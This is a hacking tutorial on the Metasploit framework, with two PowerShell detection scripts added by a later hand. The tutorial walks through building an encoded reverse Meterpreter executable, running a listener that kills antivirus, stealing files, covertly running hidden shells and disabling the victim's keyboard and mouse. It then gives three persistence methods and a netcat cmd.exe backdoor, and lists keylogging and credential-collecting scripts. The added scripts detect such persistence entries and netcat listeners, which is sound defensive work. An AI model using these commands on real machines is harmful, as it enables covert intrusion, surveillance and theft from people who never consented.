If you don't know what the Metasploit framework is, then look it up. You've been missing out. In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it,
you could write fifteen books on it. MSF is Open Source and coded in the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna start with Payloads. Many people know already that MSF is an exploitation framework, as in you can
work out vulnerabilities in software, and use the framework to rapidly make working exploits for them.
There's hundreds of payloads that you can choose from, so that when you exploit the system in question
you can easily automate the execution of a payload of your choice on the machine.
I will show you how to turn those payloads into an actual .EXE so it will just run as is.
Ok. Let's begin:
Fire up your MSF, make sure it's updated, as they are constantly making changes to it.
For BackTrack I think it's: cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
=====================================================
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, as we are waiting for a connection from RHOST (remote host))
LPORT - self explanatory. Just make sure you have port forwarding set up on your router of course.
Meterpreter - An incredibly advanced shell which sort of simulates bash (even on a Windows system) - lots of power.
You'll see how much power shortly.
Now you have your PAYLOAD.exe
Metasploit Listener
===================
In the /framework3 directory:
$ ./msfconsole
(Takes a little minute for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
set LHOST 192.162.1.50 (Make sure you set LHOST to your address on the network and not localhost)
set LPORT 82 (Sometimes port 80, 443 or 8080 is better, as to some firewalls it looks less suspicious)
set ExitOnSession false (As soon as you get a session, it doesn't automatically drop you into it)
set AutoRunScript /killav.rb (when the client connects back and the meterpreter payload is uploaded, the killav.rb script is uploaded and executed)
exploit -j (sets the exploit up as a job, good for shells on multiple clients)
(See more on scripts further down)
Continuation
============
When all goes well, and you have hit 'exploit -j' and have waited for a client to click on the payload.exe you created earlier,
you will see stuff happening on the screen. You will notice it run the killav script, then say something like:
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type:
sessions -l (this lists whatever sessions we have, i.e. clients. Notice the lowercase L)
sessions -i 1 (this is to interact with session 1. i.e. Interact. Lowercase I)
If you need to come out of this screen, either CTRL+Z or type 'background' without the ''.
Ok.. So we are in the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this will show you the currently logged in user)
$ Meterpreter > idletime (wanna see how long the user has been afk?)
$ Meterpreter > help (this will show you a massive list of amazing commands to use!)
$ Meterpreter > run priv (then check help again, more privileged commands now eh?)
Ok, I will show some really handy ones:
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the client)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents and Settings" (cd's to a folder with spaces in it)
$ Meterpreter > ls (this is an example of the bash type commands we have on the target Windows machine, version of dir)
$ Meterpreter > download -r "My Documents" /home/root/Documents (This would download the entire "My Docs" folder over to us)
$ Meterpreter > execute -f evil.exe (executes the file on the client)
$ Meterpreter > execute -f cmd.exe -c -H -i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
(the client will not see a thing you're doing as all the options are set properly)
Check down the bottom for some useful cmd.exe commands.
$ Meterpreter > uictl disable keyboard (disables some user interface components)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this will show you a detailed list of all processes running on the target machine)
$ Meterpreter > migrate pid (migrates/injects itself into some other process id) e.g. migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills a process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As A Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to the Application Data directory)
execute -f cmd.exe -c -H -i
Way 1 :
cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup, obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs the backdoor at 7pm on all weekdays. The at command works for all Windows versions I think)
Way 3 :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins as SYSTEM (on XP. XP Home doesn't have schtasks, but has 'at' though))
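As an added defensive example (my own, not code from the original tutorial): all three "ways" above land in places an administrator can enumerate, so this PowerShell audit lists the HKCU/HKLM Run keys and every scheduled task (jobs created with at.exe and with schtasks.exe both appear in schtasks /query) and flags entries that launch a binary from a user-profile data directory such as Application Data. It assumes Windows PowerShell 5.1 or later with the built-in schtasks.exe; the path pattern and the "suspicious" label are my own choices, not something the tutorial defines.

```powershell
# Added defensive example (not from the original tutorial): enumerate the
# autostart locations the tutorial uses for persistence and flag entries that
# launch an executable from a user-profile data directory.
# Assumption: Windows PowerShell 5.1+ and the built-in schtasks.exe.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
)

# Directories a legitimate installer rarely uses for an autostart binary
# (pattern is my own choice; extend it for your environment).
$suspectPathPattern = '(?i)\\(Application Data|AppData|Local Settings|Temp)\\'

$findings = @()

# 1. Registry Run keys (Way 1 in the tutorial).
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Skip the PSPath/PSParentPath/... metadata the provider adds.
        if ($p.Name -like 'PS*') { continue }
        if ($p.Value -match $suspectPathPattern) {
            $findings += [pscustomobject]@{
                Source  = "Run key $key"
                Name    = $p.Name
                Command = $p.Value
            }
        }
    }
}

# 2./3. Scheduled tasks (Way 2 via at.exe and Way 3 via schtasks.exe both
# show up here). Verbose CSV output gives one row per task with the columns
# 'TaskName', 'Task To Run' and 'Run As User'.
$tasks = schtasks /query /v /fo CSV | ConvertFrom-Csv
foreach ($t in $tasks) {
    # Some Windows versions repeat the header row per task folder; skip it.
    if ($t.TaskName -eq 'TaskName') { continue }
    if ($t.'Task To Run' -match $suspectPathPattern) {
        $findings += [pscustomobject]@{
            Source  = "Scheduled task (runs as $($t.'Run As User'))"
            Name    = $t.TaskName
            Command = $t.'Task To Run'
        }
    }
}

if ($findings.Count -eq 0) {
    'No autostart entries point into a user-profile data directory.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it in an elevated prompt so the HKLM key and tasks owned by other users are readable; a hit on a task that runs as SYSTEM from a path under Application Data is exactly the shape of "Way 3" above and deserves a look at the file it points to.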
Plant A Simple Backdoor with Netcat
===================================
A really simple way of planting a backdoor could be using netcat.
Steps:
1. Upload a netcat executable (nc.exe) to the remote machine.
   Meterpreter provides a command 'upload' for that.
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. Now from your machine, type nc -v -n <ip address> <port>
It will give you a command shell of the remote machine.
nc -l -d -p 80 -e c:\windows\system32\cmd.exe
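Added defensive example (my own, not part of the original post): a netcat listener bound to cmd.exe as in step 2 is simply a listening TCP socket owned by nc.exe, so this PowerShell snippet joins Get-NetTCPConnection to Win32_Process and flags listeners whose image name is nc/ncat/netcat or whose command line passes a program to -e. It assumes Windows 8 / Server 2012 or later for those cmdlets (on the XP-era hosts the tutorial describes you would use netstat -ano and tasklist instead); the regexes and the "Suspicious" column are my own.

```powershell
# Added defensive example (not from the original post): list every listening
# TCP socket with its owning process and flag netcat-style "-e cmd.exe" shells.
# Assumption: Windows 8 / Server 2012 or later (Get-NetTCPConnection, CIM).

$listeners = Get-NetTCPConnection -State Listen

# Win32_Process carries the full command line; index it by PID once.
$procs = @{}
foreach ($p in Get-CimInstance Win32_Process) {
    $procs[[int]$p.ProcessId] = $p
}

$report = foreach ($l in $listeners) {
    $p     = $procs[[int]$l.OwningProcess]
    $image = if ($p) { $p.Name } else { '<unknown>' }
    $cmd   = if ($p) { $p.CommandLine } else { '' }

    # Either the binary itself is a netcat build, or something else is being
    # told to hand a shell to the socket with -e (my own heuristics).
    $suspicious = ($image -match '(?i)^(nc|ncat|netcat)\.exe$') -or
                  ($cmd   -match '(?i)\s-e\s+\S*cmd\.exe')

    [pscustomobject]@{
        LocalAddress = $l.LocalAddress
        LocalPort    = $l.LocalPort
        PID          = $l.OwningProcess
        Image        = $image
        Suspicious   = $suspicious
        CommandLine  = $cmd
    }
}

# Suspicious rows first; everything else stays visible for context.
$report | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

The "-L" (re-listen) flag in the tutorial means the socket comes back after each client disconnects, so a one-off scan can miss it between connections; run the check on a schedule or alert on the process creation event for nc.exe instead of relying on a single snapshot.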
More On Scripts:
================
Scripts can be run from the meterpreter shell when you have a shell on a client.
All you do is: (where '$' is not to be typed. This is the bash shell)
$ run scraper -h (This will show you the options etc. for any of the scripts)
or
$ run keylogrecorder -h
The sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
There are many already within the framework, made by folk.. here's a small list of some already there:
killav.rb (kills all anti viruses running on the system)
getcountermeasure.rb (kills AVs and FWs/IDSs)
scraper.rb (logs LOADS of useful information via a series of automated commands on the client. Logs stored in /root/.msf3/)
gettelnet.rb (able to open up a telnet server on the client with a username and password)
checkvm.rb (checks to see if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb